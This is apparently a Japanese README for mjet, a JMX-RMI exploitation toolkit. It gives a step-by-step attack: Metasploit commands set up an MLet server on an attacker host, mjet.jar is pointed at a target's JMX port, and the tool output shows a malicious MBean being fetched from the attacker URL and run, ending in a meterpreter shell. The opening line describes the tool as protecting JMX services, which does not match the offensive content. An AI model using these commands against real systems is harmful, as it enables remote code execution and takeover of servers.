
Mogwai Java Management Extensions (JMX) エクスプロイトツールキット
Mogwai Security Java Management Extensions (JMX) エクスプロイトツールキット
mjet は、安全でない設定の JMX サービスを保護するために使用できるツールです。これは、Braden Thomas/Accuvant によるブログ記事「Exploiting JMX-RMI」(http://www.accuvant.com/blog/exploiting-jmx-rmi) に基づいており、標的システム上で任意の Metasploit ペイロードを実行するために使用できます。
Mjet は当初、完全な攻撃ツールキットとして計画されていましたが、Metasploit の Github リポジトリに、ネイティブ ruby で基本的な Java RMI/シリアライゼーションサポートを提供するプルリクエストが含まれていることに気付きました。これは素晴らしく、Java への依存を排除します。そのため、このツールの開発を中止し、近い将来 Metasploit モジュールを作成することにしました。
mjet は以下の部分で構成されています:
この例では以下のシステムを使用します: 攻撃者: 192.168.178.1 標的: 192.168.178.200、JMX サービスが tcp ポート 1616 で稼働
msf > use exploit/multi/misc/java_mlet_server
msf > set LHOST 192.168.178.1
msf > set SRVHOST 192.168.178.1
msf > set URIPATH /mlet/
msf > run
mjet.jar を使用して脆弱な JMX サービスに接続し、MLet Web サーバーの URL を指定します...
java -jar mjet.jar -t 192.168.178.200 -p 1616 -u http://192.168.178.1:8080/mlet/
---------------------------------------------------
MJET - Mogwai Security JMX Exploitation Toolkit 0.1
---------------------------------------------------
[+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://192.168.178.200:1616/jmxrmi ...
[+] Connected: rmi://192.168.178.164 5
[+] Trying to create MLet bean...
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.178.1:8080/mlet/
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
[+] Loaded class: metasploit.Metasploit
[+] Loaded MBean Server ID: ptIIirfM:name=BlPwaoHu,id=oWTqfkbE
[+] Invoking: metasploit.Metasploit.run()
[+] Done
そして meterpreter シェルをお楽しみください :-)